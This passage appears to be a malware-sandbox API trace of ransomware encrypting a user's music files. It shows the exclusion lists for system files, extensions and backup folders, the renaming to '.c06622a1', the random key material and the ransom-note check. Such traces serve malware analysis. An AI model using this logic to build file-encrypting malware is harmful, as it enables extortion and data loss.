RtlComputeCrc32 (PartialCrc=0x1952, Buffer=0x32e4a4, Length=0x80) returned 0x955cf16c [0160.089] RtlComputeCrc32 (PartialCrc=0xf16c, Buffer=0x32e4a4, Length=0x80) returned 0x96cb8488 [0160.089] RtlComputeCrc32 (PartialCrc=0x8488, Buffer=0x32e4a4, Length=0x80) returned 0x7b8da136 [0160.089] CloseHandle (hObject=0x19c) returned 1 [0160.089] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0160.089] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\ynIixMPajD.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\ynIixMPajD.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\ynIixMPajD.wav" [0160.089] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\ynIixMPajD.wav") returned 0x4e [0160.089] wcscpy (in: _Dest=0x32b2134, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.089] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\ynIixMPajD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\yniixmpajd.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\ynIixMPajD.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\yniixmpajd.wav.c06622a1"), dwFlags=0x8) returned 1 [0160.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\ynIixMPajD.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\yniixmpajd.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x19c [0160.092] CreateIoCompletionPort (FileHandle=0x19c, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0160.092] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x36c0020 [0160.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x10c84a69 [0160.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x276feca9 [0160.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a914f2 [0160.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x24af79d [0160.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7b7a9617 [0160.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4dd62f88 [0160.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xc10d1f0 [0160.101] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4725fa50 [0160.104] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x36c0094, Length=0x80) returned 0x955933bc [0160.105] RtlComputeCrc32 (PartialCrc=0x33bc, Buffer=0x36c0094, Length=0x80) returned 0x47178013 [0160.105] RtlComputeCrc32 (PartialCrc=0x8013, Buffer=0x36c0094, Length=0x80) returned 0xd643b08c [0160.105] RtlComputeCrc32 (PartialCrc=0xb08c, Buffer=0x36c0094, Length=0x80) returned 0x7ce86f02 [0160.105] RtlComputeCrc32 (PartialCrc=0x6f02, Buffer=0x36c0094, Length=0x80) returned 0xb3fdc64 [0160.105] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0160.105] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0160.105] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0160.105] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0160.105] FindClose (in: hFindFile=0x154208 | out: hFindFile=0x154208) returned 1 [0160.105] _wcsicmp (_Str1="backup", _Str2="LPnP0zZ7L") returned -10 [0160.105] wcslen (_String="backup") returned 0x6 [0160.105] _wcsicmp (_Str1="bak", _Str2="LPnP0zZ7L") returned -10 [0160.105] wcslen (_String="bak") returned 0x3 [0160.105] _wcsicmp (_Str1="back", _Str2="LPnP0zZ7L") returned -10 [0160.105] wcslen (_String="back") returned 0x4 [0160.105] _wcsicmp (_Str1="archive", _Str2="LPnP0zZ7L") returned -11 [0160.105] wcslen (_String="archive") returned 0x7 [0160.105] _wcsicmp (_Str1="bckp", _Str2="LPnP0zZ7L") returned -10 [0160.105] wcslen (_String="bckp") returned 0x4 [0160.106] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0160.107] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0160.108] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d06b360, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8d06b360, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8d06b360, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0160.108] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0160.108] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ea2e6d0, ftCreationTime.dwHighDateTime=0x1d5e04b, ftLastAccessTime.dwLowDateTime=0xaa34efc0, ftLastAccessTime.dwHighDateTime=0x1d5e027, ftLastWriteTime.dwLowDateTime=0xaa34efc0, ftLastWriteTime.dwHighDateTime=0x1d5e027, nFileSizeHigh=0x0, nFileSizeLow=0xc9a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="whcxcPPdpxl.mp3", cAlternateFileName="WHCXCP~1.MP3")) returned 1 [0160.108] _wcsicmp (_Str1="whcxcPPdpxl.mp3", _Str2="README.c06622a1.TXT") returned 5 [0160.108] wcsstr (_Str="whcxcPPdpxl.mp3", _SubStr="README") returned 0x0 [0160.108] _wcsicmp (_Str1="autorun.inf", _Str2="whcxcPPdpxl.mp3") returned -22 [0160.108] wcslen (_String="autorun.inf") returned 0xb [0160.108] _wcsicmp (_Str1="boot.ini", _Str2="whcxcPPdpxl.mp3") returned -21 [0160.108] wcslen (_String="boot.ini") returned 0x8 [0160.108] _wcsicmp (_Str1="bootfont.bin", _Str2="whcxcPPdpxl.mp3") returned -21 [0160.108] wcslen (_String="bootfont.bin") returned 0xc [0160.108] _wcsicmp (_Str1="bootsect.bak", _Str2="whcxcPPdpxl.mp3") returned -21 [0160.108] wcslen (_String="bootsect.bak") returned 0xc [0160.108] _wcsicmp (_Str1="desktop.ini", _Str2="whcxcPPdpxl.mp3") returned -19 [0160.108] wcslen (_String="desktop.ini") returned 0xb [0160.108] _wcsicmp (_Str1="iconcache.db", _Str2="whcxcPPdpxl.mp3") returned -14 [0160.108] wcslen (_String="iconcache.db") returned 0xc [0160.108] _wcsicmp (_Str1="ntldr", _Str2="whcxcPPdpxl.mp3") returned -9 [0160.108] wcslen (_String="ntldr") returned 0x5 [0160.109] _wcsicmp (_Str1="ntuser.dat", _Str2="whcxcPPdpxl.mp3") returned -9 [0160.109] wcslen (_String="ntuser.dat") returned 0xa [0160.109] _wcsicmp (_Str1="ntuser.dat.log", _Str2="whcxcPPdpxl.mp3") returned -9 [0160.109] wcslen (_String="ntuser.dat.log") returned 0xe [0160.109] _wcsicmp (_Str1="ntuser.ini", _Str2="whcxcPPdpxl.mp3") returned -9 [0160.109] wcslen (_String="ntuser.ini") returned 0xa [0160.109] _wcsicmp (_Str1="thumbs.db", _Str2="whcxcPPdpxl.mp3") returned -3 [0160.109] wcslen (_String="thumbs.db") returned 0x9 [0160.109] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0160.109] wcslen (_String="386") returned 0x3 [0160.109] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0160.109] wcslen (_String="adv") returned 0x3 [0160.109] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0160.109] wcslen (_String="ani") returned 0x3 [0160.109] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0160.109] wcslen (_String="bat") returned 0x3 [0160.109] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0160.109] wcslen (_String="bin") returned 0x3 [0160.109] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0160.109] wcslen (_String="cab") returned 0x3 [0160.109] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0160.109] wcslen (_String="cmd") returned 0x3 [0160.109] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0160.109] wcslen (_String="com") returned 0x3 [0160.109] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0160.109] wcslen (_String="cpl") returned 0x3 [0160.109] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0160.109] wcslen (_String="cur") returned 0x3 [0160.109] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0160.110] wcslen (_String="deskthemepack") returned 0xd [0160.110] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0160.110] wcslen (_String="diagcab") returned 0x7 [0160.110] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0160.110] wcslen (_String="diagcfg") returned 0x7 [0160.110] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0160.110] wcslen (_String="diagpkg") returned 0x7 [0160.110] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0160.110] wcslen (_String="dll") returned 0x3 [0160.110] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0160.110] wcslen (_String="drv") returned 0x3 [0160.110] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0160.110] wcslen (_String="exe") returned 0x3 [0160.110] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0160.110] wcslen (_String="hlp") returned 0x3 [0160.110] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0160.110] wcslen (_String="icl") returned 0x3 [0160.110] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0160.110] wcslen (_String="icns") returned 0x4 [0160.110] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0160.110] wcslen (_String="ico") returned 0x3 [0160.110] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0160.110] wcslen (_String="ics") returned 0x3 [0160.110] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0160.110] wcslen (_String="idx") returned 0x3 [0160.110] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0160.110] wcslen (_String="ldf") returned 0x3 [0160.110] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0160.110] wcslen (_String="lnk") returned 0x3 [0160.110] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0160.111] wcslen (_String="mod") returned 0x3 [0160.111] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0160.111] wcslen (_String="mpa") returned 0x3 [0160.111] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0160.111] wcslen (_String="msc") returned 0x3 [0160.111] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0160.111] wcslen (_String="msp") returned 0x3 [0160.111] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0160.111] wcslen (_String="msstyles") returned 0x8 [0160.111] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0160.111] wcslen (_String="msu") returned 0x3 [0160.111] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0160.111] wcslen (_String="nls") returned 0x3 [0160.111] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0160.111] wcslen (_String="nomedia") returned 0x7 [0160.111] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0160.111] wcslen (_String="ocx") returned 0x3 [0160.111] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0160.111] wcslen (_String="prf") returned 0x3 [0160.111] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0160.111] wcslen (_String="ps1") returned 0x3 [0160.111] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0160.111] wcslen (_String="rom") returned 0x3 [0160.111] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0160.111] wcslen (_String="rtp") returned 0x3 [0160.111] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0160.111] wcslen (_String="scr") returned 0x3 [0160.112] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0160.112] wcslen (_String="shs") returned 0x3 [0160.112] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0160.112] wcslen (_String="spl") returned 0x3 [0160.112] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0160.112] wcslen (_String="sys") returned 0x3 [0160.112] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0160.112] wcslen (_String="theme") returned 0x5 [0160.112] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0160.112] wcslen (_String="themepack") returned 0x9 [0160.112] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0160.112] wcslen (_String="wpx") returned 0x3 [0160.112] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0160.112] wcslen (_String="lock") returned 0x4 [0160.112] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0160.112] wcslen (_String="key") returned 0x3 [0160.112] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0160.112] wcslen (_String="hta") returned 0x3 [0160.112] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0160.112] wcslen (_String="msi") returned 0x3 [0160.112] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0160.112] wcslen (_String="pdb") returned 0x3 [0160.112] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0160.112] wcslen (_String="sqlite") returned 0x6 [0160.113] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg")) returned 0x10 [0160.113] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0160.113] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" [0160.113] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG") returned 0x35 [0160.113] wcscpy (in: _Dest=0x32720e4, _Source="whcxcPPdpxl.mp3" | out: _Dest="whcxcPPdpxl.mp3") returned="whcxcPPdpxl.mp3" [0160.113] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\whcxcPPdpxl.mp3", dwFileAttributes=0x80) returned 1 [0160.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\whcxcPPdpxl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\whcxcppdpxl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0160.113] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.113] ReadFile (in: hFile=0x1d0, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0160.114] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x89ebbc74 [0160.114] RtlComputeCrc32 (PartialCrc=0xbc74, Buffer=0x32e724, Length=0x80) returned 0xfa1b83fd [0160.114] RtlComputeCrc32 (PartialCrc=0x83fd, Buffer=0x32e724, Length=0x80) returned 0xc7907b7a [0160.114] RtlComputeCrc32 (PartialCrc=0x7b7a, Buffer=0x32e724, Length=0x80) returned 0xbdceff89 [0160.114] RtlComputeCrc32 (PartialCrc=0xff89, Buffer=0x32e724, Length=0x80) returned 0xb402df39 [0160.114] CloseHandle (hObject=0x1d0) returned 1 [0160.114] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0160.115] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\whcxcPPdpxl.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\whcxcPPdpxl.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\whcxcPPdpxl.mp3" [0160.115] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\whcxcPPdpxl.mp3") returned 0x45 [0160.115] wcscpy (in: _Dest=0x328210a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.115] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\whcxcPPdpxl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\whcxcppdpxl.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\whcxcPPdpxl.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\whcxcppdpxl.mp3.c06622a1"), dwFlags=0x8) returned 1 [0160.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\whcxcPPdpxl.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\whcxcppdpxl.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0160.117] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0160.117] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3750020 [0160.127] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x26d13ce2 [0160.127] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d7b7ea2 [0160.127] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x314cb493 [0160.127] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x66e166b5 [0160.127] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x63759587 [0160.127] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x31c13eea [0160.127] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a855a99 [0160.127] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3aba89ea [0160.130] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3750094, Length=0x80) returned 0x4fe1f30a [0160.130] RtlComputeCrc32 (PartialCrc=0xf30a, Buffer=0x3750094, Length=0x80) returned 0x8abe3f0 [0160.130] RtlComputeCrc32 (PartialCrc=0xe3f0, Buffer=0x3750094, Length=0x80) returned 0x319ce10d [0160.130] RtlComputeCrc32 (PartialCrc=0xe10d, Buffer=0x3750094, Length=0x80) returned 0x8d3efabb [0160.130] RtlComputeCrc32 (PartialCrc=0xfabb, Buffer=0x3750094, Length=0x80) returned 0x9dc77df7 [0160.130] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0160.130] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0160.132] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0160.133] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0160.133] FindClose (in: hFindFile=0x1541c8 | out: hFindFile=0x1541c8) returned 1 [0160.133] _wcsicmp (_Str1="backup", _Str2="4lOUbG") returned 46 [0160.133] wcslen (_String="backup") returned 0x6 [0160.133] _wcsicmp (_Str1="bak", _Str2="4lOUbG") returned 46 [0160.133] wcslen (_String="bak") returned 0x3 [0160.133] _wcsicmp (_Str1="back", _Str2="4lOUbG") returned 46 [0160.133] wcslen (_String="back") returned 0x4 [0160.133] _wcsicmp (_Str1="archive", _Str2="4lOUbG") returned 45 [0160.133] wcslen (_String="archive") returned 0x7 [0160.133] _wcsicmp (_Str1="bckp", _Str2="4lOUbG") returned 46 [0160.133] wcslen (_String="bckp") returned 0x4 [0160.133] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0160.135] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0160.136] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cfd620, ftCreationTime.dwHighDateTime=0x1d5dcc8, ftLastAccessTime.dwLowDateTime=0xdde82350, ftLastAccessTime.dwHighDateTime=0x1d5d802, ftLastWriteTime.dwLowDateTime=0xdde82350, ftLastWriteTime.dwHighDateTime=0x1d5d802, nFileSizeHigh=0x0, nFileSizeLow=0x53a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="jiDmBv.mp3", cAlternateFileName="")) returned 1 [0160.136] _wcsicmp (_Str1="jiDmBv.mp3", _Str2="README.c06622a1.TXT") returned -8 [0160.136] wcsstr (_Str="jiDmBv.mp3", _SubStr="README") returned 0x0 [0160.136] _wcsicmp (_Str1="autorun.inf", _Str2="jiDmBv.mp3") returned -9 [0160.136] wcslen (_String="autorun.inf") returned 0xb [0160.136] _wcsicmp (_Str1="boot.ini", _Str2="jiDmBv.mp3") returned -8 [0160.136] wcslen (_String="boot.ini") returned 0x8 [0160.136] _wcsicmp (_Str1="bootfont.bin", _Str2="jiDmBv.mp3") returned -8 [0160.136] wcslen (_String="bootfont.bin") returned 0xc [0160.136] _wcsicmp (_Str1="bootsect.bak", _Str2="jiDmBv.mp3") returned -8 [0160.136] wcslen (_String="bootsect.bak") returned 0xc [0160.136] _wcsicmp (_Str1="desktop.ini", _Str2="jiDmBv.mp3") returned -6 [0160.136] wcslen (_String="desktop.ini") returned 0xb [0160.136] _wcsicmp (_Str1="iconcache.db", _Str2="jiDmBv.mp3") returned -1 [0160.136] wcslen (_String="iconcache.db") returned 0xc [0160.136] _wcsicmp (_Str1="ntldr", _Str2="jiDmBv.mp3") returned 4 [0160.136] wcslen (_String="ntldr") returned 0x5 [0160.136] _wcsicmp (_Str1="ntuser.dat", _Str2="jiDmBv.mp3") returned 4 [0160.136] wcslen (_String="ntuser.dat") returned 0xa [0160.136] _wcsicmp (_Str1="ntuser.dat.log", _Str2="jiDmBv.mp3") returned 4 [0160.136] wcslen (_String="ntuser.dat.log") returned 0xe [0160.137] _wcsicmp (_Str1="ntuser.ini", _Str2="jiDmBv.mp3") returned 4 [0160.137] wcslen (_String="ntuser.ini") returned 0xa [0160.137] _wcsicmp (_Str1="thumbs.db", _Str2="jiDmBv.mp3") returned 10 [0160.137] wcslen (_String="thumbs.db") returned 0x9 [0160.137] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0160.137] wcslen (_String="386") returned 0x3 [0160.137] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0160.137] wcslen (_String="adv") returned 0x3 [0160.137] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0160.137] wcslen (_String="ani") returned 0x3 [0160.137] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0160.137] wcslen (_String="bat") returned 0x3 [0160.137] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0160.137] wcslen (_String="bin") returned 0x3 [0160.137] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0160.137] wcslen (_String="cab") returned 0x3 [0160.137] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0160.137] wcslen (_String="cmd") returned 0x3 [0160.137] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0160.137] wcslen (_String="com") returned 0x3 [0160.137] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0160.137] wcslen (_String="cpl") returned 0x3 [0160.137] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0160.137] wcslen (_String="cur") returned 0x3 [0160.137] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0160.138] wcslen (_String="deskthemepack") returned 0xd [0160.138] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0160.138] wcslen (_String="diagcab") returned 0x7 [0160.138] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0160.138] wcslen (_String="diagcfg") returned 0x7 [0160.138] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0160.138] wcslen (_String="diagpkg") returned 0x7 [0160.138] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0160.138] wcslen (_String="dll") returned 0x3 [0160.138] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0160.138] wcslen (_String="drv") returned 0x3 [0160.138] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0160.138] wcslen (_String="exe") returned 0x3 [0160.138] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0160.138] wcslen (_String="hlp") returned 0x3 [0160.138] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0160.138] wcslen (_String="icl") returned 0x3 [0160.138] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0160.138] wcslen (_String="icns") returned 0x4 [0160.138] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0160.138] wcslen (_String="ico") returned 0x3 [0160.138] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0160.138] wcslen (_String="ics") returned 0x3 [0160.138] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0160.138] wcslen (_String="idx") returned 0x3 [0160.138] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0160.138] wcslen (_String="ldf") returned 0x3 [0160.138] _wcsicmp (_Str1="lnk", 